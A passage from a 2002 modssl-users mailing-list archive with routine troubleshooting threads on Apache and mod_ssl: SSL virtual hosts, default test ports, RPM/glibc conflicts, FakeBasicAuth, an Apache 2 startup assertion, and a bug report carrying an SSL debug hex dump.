    ...



    ServerName www.site2.com
    ...
    SSLCertificateFile ...
    SSLCertificateKeyFile ...


Assuming that the firewall sends httpd requests to 192.168.0.1, is it
possible for apache to be configured to handle requests made to
www.site2.com/192.168.0.2? Or can I accomplish what I desire by using some
sort of proxy that receives all httpd requests from the firewall and then
connects to my apache server.

I guess my bottom line question is - can I use internal IP addresses to use
multiple ssl-enabled virtual hosts, and if so, how?

Regards,

Michael
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 16:57:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA17289; Mon, 10 Jun 2002 16:56:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id QAA17272; Mon, 10 Jun 2002 16:55:53 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id 18DAAC68DB
	for ; Mon, 10 Jun 2002 10:55:44 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g5AEthra007067
	for ; Mon, 10 Jun 2002 10:55:43 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id KAA30651; Mon, 10 Jun 2002 10:55:42 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Testing with a dummy certificate...
From: Sean M Alderman 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.6.99 
Date: 10 Jun 2002 10:55:42 -0400
Message-Id: <1023720942.1568.42.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,
  Just got Apache and Mod_SSL setup last friday for the first time.  I
did the make certificate to create a dummy cert and installed it.  I run
APACHE_HOME/bin/apachectl startssl to get the server started and get
prompted for the passphrase, enter the phrase and the server starts up.
When I point a browser to it (tried ssl-aware lynx, Netscape 4.78, and
Mozilla 0.99) the browser gives me an error (not an unrecognized CA
certificate message).  Below is a snippet of some logs from
APACHE_HOME/logs.  Could anyone tell me what the Invalid Method Request
F message means?  Oh and I'm running Apache 1.3.24. mod_SSL 2.8.8, on
64bit UltraSPARC Solaris 2.8.  Thanks!

Logs...
# pwd
/usr/appl/apache/logs
# tail access_log
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
/manual/images/apache_pb.gif HTTP/1.1" 200 1806
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
/manual/images/openssl_ics.gif HTTP/1.1" 200 2063
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
/manual/images/mod_ssl_sb.gif HTTP/1.1" 200 2007
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
/manual/images/feather.jpg HTTP/1.1" 200 7108
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:03 -0400] "F" 501 -
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:03 -0400] "F" 501 -
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:08 -0400] "F" 501 -
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:19 -0400] "F" 501 -
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:44:54 -0400] "F" 501 -
WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:45:08 -0400] "F" 501 -
# tail error_log
[Fri Jun  7 15:42:19 2002] [notice] Accept mutex: fcntl (Default: fcntl)
[Mon Jun 10 10:41:12 2002] [notice] caught SIGTERM, shutting down
[Mon Jun 10 10:41:45 2002] [notice] Apache/1.3.24 (Unix) PHP/4.2.0
mod_ssl/2.8.8 OpenSSL/0.9.6c configured -- resuming normal operations
[Mon Jun 10 10:41:45 2002] [notice] Accept mutex: fcntl (Default: fcntl)
[Mon Jun 10 10:42:03 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
method in request F
[Mon Jun 10 10:42:03 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
method in request F
[Mon Jun 10 10:42:08 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
method in request F
[Mon Jun 10 10:42:19 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
method in request F
[Mon Jun 10 10:44:54 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
method in request F
[Mon Jun 10 10:45:08 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
method in request F
# tail ssl_engine_log
[10/Jun/2002 10:41:39 14549] [info]  Init: Seeding PRNG with 136 bytes
of entropy
[10/Jun/2002 10:41:39 14549] [info]  Init: Generating temporary RSA
private keys (512/1024 bits)
[10/Jun/2002 10:41:45 14549] [info]  Init: Configuring temporary DH
parameters (512/1024 bits)
[10/Jun/2002 10:41:45 14553] [info]  Init: 2nd startup round (already
detached)
[10/Jun/2002 10:41:45 14553] [info]  Init: Reinitializing OpenSSL
library
[10/Jun/2002 10:41:45 14553] [info]  Init: Seeding PRNG with 136 bytes
of entropy
[10/Jun/2002 10:41:45 14553] [info]  Init: Configuring temporary RSA
private keys (512/1024 bits)
[10/Jun/2002 10:41:45 14553] [info]  Init: Configuring temporary DH
parameters (512/1024 bits)
[10/Jun/2002 10:41:45 14553] [info]  Init: Initializing (virtual)
servers for SSL
[10/Jun/2002 10:41:45 14553] [info]  Init: Configuring server
XXXX.lerc.nasa.gov:8443 for SSL protocol



-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 17:05:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA18006; Mon, 10 Jun 2002 17:04:49 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id RAA17961; Mon, 10 Jun 2002 17:04:02 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id F05FCC68D1
	for ; Mon, 10 Jun 2002 11:03:56 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g5AF3ura009215
	for ; Mon, 10 Jun 2002 11:03:56 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id LAA30723; Mon, 10 Jun 2002 11:03:56 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Re: Testing with a dummy certificate...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: <1023720942.1568.42.camel@salderman.lerc.nasa.gov>
References: <1023720942.1568.42.camel@salderman.lerc.nasa.gov>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.6.99 
Date: 10 Jun 2002 11:03:56 -0400
Message-Id: <1023721436.5612.51.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Opps...Nevermind, I just found that I had missed changing one line in
the conf/httpd.conf to change the port number from 8443 to 443.

Is there are a reason why the config defaults to ports 8080 and 8443
instead of 80 and 443?

On Mon, 2002-06-10 at 10:55, Sean M Alderman wrote:
> Hi all,
>   Just got Apache and Mod_SSL setup last friday for the first time.  I
> did the make certificate to create a dummy cert and installed it.  I run
> APACHE_HOME/bin/apachectl startssl to get the server started and get
> prompted for the passphrase, enter the phrase and the server starts up.
> When I point a browser to it (tried ssl-aware lynx, Netscape 4.78, and
> Mozilla 0.99) the browser gives me an error (not an unrecognized CA
> certificate message).  Below is a snippet of some logs from
> APACHE_HOME/logs.  Could anyone tell me what the Invalid Method Request
> F message means?  Oh and I'm running Apache 1.3.24. mod_SSL 2.8.8, on
> 64bit UltraSPARC Solaris 2.8.  Thanks!
> 
> Logs...
> # pwd
> /usr/appl/apache/logs
> # tail access_log
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
> /manual/images/apache_pb.gif HTTP/1.1" 200 1806
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
> /manual/images/openssl_ics.gif HTTP/1.1" 200 2063
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
> /manual/images/mod_ssl_sb.gif HTTP/1.1" 200 2007
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:41:58 -0400] "GET
> /manual/images/feather.jpg HTTP/1.1" 200 7108
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:03 -0400] "F" 501 -
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:03 -0400] "F" 501 -
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:08 -0400] "F" 501 -
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:42:19 -0400] "F" 501 -
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:44:54 -0400] "F" 501 -
> WWW.XXX.YYY.ZZZ - - [10/Jun/2002:10:45:08 -0400] "F" 501 -
> # tail error_log
> [Fri Jun  7 15:42:19 2002] [notice] Accept mutex: fcntl (Default: fcntl)
> [Mon Jun 10 10:41:12 2002] [notice] caught SIGTERM, shutting down
> [Mon Jun 10 10:41:45 2002] [notice] Apache/1.3.24 (Unix) PHP/4.2.0
> mod_ssl/2.8.8 OpenSSL/0.9.6c configured -- resuming normal operations
> [Mon Jun 10 10:41:45 2002] [notice] Accept mutex: fcntl (Default: fcntl)
> [Mon Jun 10 10:42:03 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
> method in request F
> [Mon Jun 10 10:42:03 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
> method in request F
> [Mon Jun 10 10:42:08 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
> method in request F
> [Mon Jun 10 10:42:19 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
> method in request F
> [Mon Jun 10 10:44:54 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
> method in request F
> [Mon Jun 10 10:45:08 2002] [error] [client WWW.XXX.YYY.ZZZ] Invalid
> method in request F
> # tail ssl_engine_log
> [10/Jun/2002 10:41:39 14549] [info]  Init: Seeding PRNG with 136 bytes
> of entropy
> [10/Jun/2002 10:41:39 14549] [info]  Init: Generating temporary RSA
> private keys (512/1024 bits)
> [10/Jun/2002 10:41:45 14549] [info]  Init: Configuring temporary DH
> parameters (512/1024 bits)
> [10/Jun/2002 10:41:45 14553] [info]  Init: 2nd startup round (already
> detached)
> [10/Jun/2002 10:41:45 14553] [info]  Init: Reinitializing OpenSSL
> library
> [10/Jun/2002 10:41:45 14553] [info]  Init: Seeding PRNG with 136 bytes
> of entropy
> [10/Jun/2002 10:41:45 14553] [info]  Init: Configuring temporary RSA
> private keys (512/1024 bits)
> [10/Jun/2002 10:41:45 14553] [info]  Init: Configuring temporary DH
> parameters (512/1024 bits)
> [10/Jun/2002 10:41:45 14553] [info]  Init: Initializing (virtual)
> servers for SSL
> [10/Jun/2002 10:41:45 14553] [info]  Init: Configuring server
> XXXX.lerc.nasa.gov:8443 for SSL protocol
> 
> 
> 
> -- 
> Sean M. Alderman
> ITRACK Systems Analyst
> PACE/NCI - NASA Glenn Research Center
> (216) 433-2795
> 
> Calling a windowed operating system "Windows" is like naming an
> automobile "Wheels."
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 17:13:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA18736; Mon, 10 Jun 2002 17:12:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blade.devel.redhat.com id RAA18666; Mon, 10 Jun 2002 17:11:49 +0200 (MET DST)
Received: from blade.devel.redhat.com (localhost.localdomain [127.0.0.1])
	by blade.devel.redhat.com (8.12.3/8.12.3) with ESMTP id g5AFBKir015720
	for ; Mon, 10 Jun 2002 11:11:20 -0400
Received: (from nalin@localhost)
	by blade.devel.redhat.com (8.12.3/8.12.3/Submit) id g5AFBJFt015718
	for modssl-users@modssl.org; Mon, 10 Jun 2002 11:11:19 -0400
Date: Mon, 10 Jun 2002 11:11:19 -0400
From: Nalin Dahyabhai 
To: modssl-users@modssl.org
Subject: Re: RHL7.0 with openssl0.9.5a & 0.9.6
Message-ID: <20020610151119.GA581@redhat.com>
References: <200206071909.g57J9xv21909@localhost.localdomain>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200206071909.g57J9xv21909@localhost.localdomain>
User-Agent: Mutt/1.4i
X-Random-Fortune: Were there fewer fools, knaves would starve. - Anonymous
Organization: Red Hat, Inc.
X-Department: OS Development
X-Disclaimer: I am not a spokesmodel.  Views expressed are my own.
X-Key-ID: 2537B551
X-Key-Fingerprint: 44D4 B47B 392A 7A64 1D72  08E2 236F 3E15 2537 B551
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nalin Dahyabhai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Jun 07, 2002 at 07:09:59PM -0000, ben@foundmoney.com wrote:
> I just upgraded my openssl and the sent a SIGHUP to httpd and I got the 
> following error:
> 
> Syntax error on line 265 of /etc/httpd/conf/httpd.conf:
> Cannot load /etc/httpd/modules/libssl.so into server: symbol __sysconf, 
> version GLIBC_2.2 not defined in file libc.so.6 with link time reference

When you upgraded to the newer packages, did you also have the glibc
updates applied (or did you apply it at the same time)?  If not, then
updating glibc (http://rhn.redhat.com/errata/RHSA-2001-160.html) will
probably fix it.

HTH,

Nalin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 18:08:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA22215; Mon, 10 Jun 2002 18:07:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR003.sc1.videotron.ca id SAA22187; Mon, 10 Jun 2002 18:06:55 +0200 (MET DST)
Received: from toilet ([24.202.164.28]) by
          VL-MS-MR003.sc1.videotron.ca (Netscape Messaging Server 4.15
          MR003 Jul 24 2001 16:23:26) with ESMTP id GXHZFH03.IYY for
          ; Mon, 10 Jun 2002 12:06:53 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17HRgz-0000Hg-00; Mon, 10 Jun 2002 12:06:53 -0400
Date: Mon, 10 Jun 2002 12:06:52 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: Testing with a dummy certificate...
In-Reply-To: <1023721436.5612.51.camel@salderman.lerc.nasa.gov>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

On 10 Jun 2002, Sean M Alderman wrote:

> Opps...Nevermind, I just found that I had missed changing one line in
> the conf/httpd.conf to change the port number from 8443 to 443.
>
> Is there are a reason why the config defaults to ports 8080 and 8443
> instead of 80 and 443?

You can only start services on ports below 1024 if you are root. At least
it's that way on respectable systems. :-) The default to 8080 and 8443
assumes that, like everything else (default index.html(s), dummy certs),
it should install some kind of template installation for you to test with
and change rather than trying to configure anything production-like. It
also reduces the chance that it conflicts with any system-wide running
web-server upon installation.

Cheers,
Geoff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 18:21:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA24444; Mon, 10 Jun 2002 18:20:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost.localdomain id SAA24387; Mon, 10 Jun 2002 18:19:18 +0200 (MET DST)
From: ben@foundmoney.com
Received: from foundmoney.com (cdnetbmai0002 [127.0.0.1])
	by localhost.localdomain (8.11.6/8.11.6) with SMTP id g5AGDCv27368;
	Mon, 10 Jun 2002 12:13:12 -0400
Message-Id: <200206101613.g5AGDCv27368@localhost.localdomain>
Date: Mon, 10 Jun 2002 16:13:12 -0000
To: , 
Subject: RE: RHL7.0 with openssl0.9.5a & 0.9.6
X-Mailer: TWIG 2.4.0
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F020671A0@pborolocal.rnib.org.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ben@foundmoney.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well here's the situation. I need openssl 0.9.6 but I also need openssl 
0.9.5a. So RedHat came out with three packages:
openssl-0.9.6 (refered to as 0.9.6)
openssl-0.9.5a (refered to as 0.9.5a)
openssl095a-0.9.5a (refered to as openssl095a)

Since you can't install two of the same package, they created the third one 
so you can install both 0.9.6 and 0.9.5a. So in order for me to install 
openssl-0.9.6 i had to install openssl095a so that the 0.9.5a didn't get 
killed. But I had to forcibly install openssl095a since the files are owned 
by the 0.9.5a package. So now we have openssl095a installed as well as 0.9.5a 
which really doesn't make a big diff since they cover the same files. I then 
installed 0.9.6 as an upgrade to 0.9.5a and that installed fine. So now I 
have the libs for openssl 0.9.5a (openssl095a-0.9.5a-14) and openssl 0.9.6 
(openssl-0.9.6-9) installed and the the walls have come tumbling down.

so openssl 0.9.5a is never removed, i just installed openssl095a 0.9.5a and 
then openssl 0.9.6 ALTHO it may be the case that i should've upgraded to 
0.9.6 (forcibly) and then install openssl095a to cover my tracks. Anyhoo, I'm 
going to reinstall the original RPM and retry my procedures.

Ben

John.Airey@rnib.org.uk said:

> Why did you forcibly install and upgrade the packages? Were there error
> messages without it?
> 
> The ONLY time I'd ever forcibly install a package is if it was already
> installed according to the RPM database but files were damaged. This is
> because certain packages (eg openssl) cannot be removed and reinstalled
> because of the number of dependencies on them.
> 
> Likewise, I'd never use no-deps without a really really good reason.
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 18:27:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA24857; Mon, 10 Jun 2002 18:26:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.cnaf.infn.it id SAA24820; Mon, 10 Jun 2002 18:25:37 +0200 (MET DST)
Received: from cnaf.infn.it (sherlock.cnaf.infn.it [131.154.3.82])
	(authenticated bits=0)
	by iris.cnaf.infn.it (8.12.2/8.12.2) with ESMTP id g5AGOeQ6004654
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NO)
	for ; Mon, 10 Jun 2002 18:24:42 +0200
Message-ID: <3D04D2E2.C7BFF2BE@cnaf.infn.it>
Date: Mon, 10 Jun 2002 18:25:06 +0200
From: "luca dell'agnello" 
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: fakebasicauth
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "luca dell'agnello" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi
I would like to use FakeBasicAuth in conjunction with mod_auth_mysql in
order to check for DN in a db.
Any hints ?

TIA

luca

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 18:31:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA25113; Mon, 10 Jun 2002 18:30:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id SAA25031; Mon, 10 Jun 2002 18:29:13 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Mon, 10 Jun 2002 09:29:36 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Mon, 10 Jun 2002 09:29:02 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Mon, 10 Jun 2002 09:28:43 -0700
From: "Jeff Landers" 
To: 
Subject: apache2 won't start
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA25103
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

As this rookie creeps ever closer to getting it to run, I keep coming up with problems that I am sure someone has seen before. Thanks for the help.

Apache 2036
ssl      096c
on solaris 8




 ./bin/apachectl startssl
[Mon Jun 10 10:19:51 2002] [crit] [Mon Jun 10 10:19:51 2002] file vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped
./bin/apachectl startssl: httpd could not be started


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 19:02:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA26747; Mon, 10 Jun 2002 19:01:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id TAA26711; Mon, 10 Jun 2002 19:00:38 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5AGufT24042
	for ; Mon, 10 Jun 2002 12:56:41 -0400
Date: Mon, 10 Jun 2002 12:56:41 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: apache2 won't start
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 10 Jun 2002, Jeff Landers wrote:

>  ./bin/apachectl startssl [Mon Jun 10 10:19:51 2002] [crit] [Mon Jun 10
> 10:19:51 2002] file vhost.c, line 232, assertion "rv == APR_SUCCESS"
> failed Abort - core dumped ./bin/apachectl startssl: httpd could not be
> started


That means the call to apr_sockaddr_info_get() on the address
"255.255.255.255" failed (the call is made because you're using
"_default_" in one of your vhosts).  So then the question is: why did it
fail?  Well, to know that, I need to know (a) what the actual return code
was, (b) what OS you're running, and it would be helpful to also have (c)
a backtrace.

See http://httpd.apache.org/dev/debugging.html for help on fetching b and
c.  :)

Thanks,
Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 20:34:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA01613; Mon, 10 Jun 2002 20:34:03 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA01324; Mon, 10 Jun 2002 20:30:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 358F34CE790; Mon, 10 Jun 2002 20:30:57 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8A8D128973; Mon, 10 Jun 2002 19:51:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id QAA15580; Mon, 10 Jun 2002 16:24:07 +0200 (MET DST)
Date: Mon, 10 Jun 2002 16:24:07 +0200 (MET DST)
Message-Id: <200206101424.QAA15580@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] I/O Error when using https (PR#715)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Stephan PAVEK, Mag.
Version: 2.8.1
OS: Win NT 40
Submission from: (NULL) (193.83.101.90)


We are running a web-application using SSL. The environment is as follows: IAS
1.0.2.2.2 (ORACLE) using Apache (v 1.3.19) and open_ssl (v 0.9.5a) on an
AIX-Machine, ORACLE-DB v. 8.1.7.3.
Using IE Explore > 5.01 (we didn't test older versions) we get I/O errors in the
log-file (ssl_engine_log). We got the following log-entries. These error result
in empty pages on the Browser (

+-------------------------------------------------------------------------+
[10/Jun/2002 15:43:06 35008] [debug] OpenSSL: read 813/18437 bytes from
BIO#202FF4B8 [mem: 204557C8] (BIO dump follows)
+-------------------------------------------------------------------------+
| 0000: 17 03 01 03 28 8a f8 91-2e 50 78 b0 02 4e 23 68  ....(....Px..N#h |
| 0010: 53 95 8f 7d d4 55 24 ab-e4 66 88 59 6f 78 05 d5  S..}.U$..f.Yox.. |
| 0020: 50 01 e2 96 ac 8c 8f 08-5e 68 12 9b 27 68 22 75  P.......^h..'h"u |
| 0030: 24 80 cc 2a 13 82 eb 4b-01 82 93 78 45 c3 66 1c  $..*...K...xE.f. |
| 0040: 22 fa 3f a1 9a 78 1c a7-ce 66 98 ab f0 4b e9 38  ".?..x...f...K.8 |
| 0050: 88 03 ce 16 12 33 6a 74-e2 8a df 5e d5 3f 98 58  .....3jt...^.?.X |
| 0060: 80 d5 5a ba ab bf 2e 3e-53 7c 14 60 4e b8 a0 03  ..Z....>S|.`N... |
| 0070: 9d 62 fc 5f 1d fc ca c7-5e ac 53 b7 46 e5 6f 8c  .b._....^.S.F.o. |
| 0080: d1 87 36 8b b4 73 5f 24-d8 63 f9 a5 a3 dd 28 38  ..6..s_$.c....(8 |
| 0090: 75 54 0c c7 28 7b c1 ba-fe c9 21 d6 dd ce 8d ed  uT..({....!..... |
| 00a0: fb 6c ab cd 76 de dc 64-b4 9a 02 ea 2f f4 c1 4a  .l..v..d..../..J |
| 00b0: a0 64 88 af b3 b8 cb 18-42 9f cb 38 8f 37 a0 43  .d......B..8.7.C |
| 00c0: 43 f6 eb bc 6f 4e bd 7c-63 fc 11 4a f4 a3 1e 56  C...oN.|c..J...V |
| 00d0: 2d 54 2e fc 32 da 93 77-de 0a 74 6f be 73 06 2d  -T..2..w..to.s.- |
| 00e0: 9d 9a 8f 9f b6 ff 80 33-24 c0 af 47 d2 37 af e6  .......3$..G.7.. |
| 00f0: 8c 7d a6 89 0a 1f 65 ca-d8 12 c6 7a e7 0b 30 74  .}....e....z..0t |
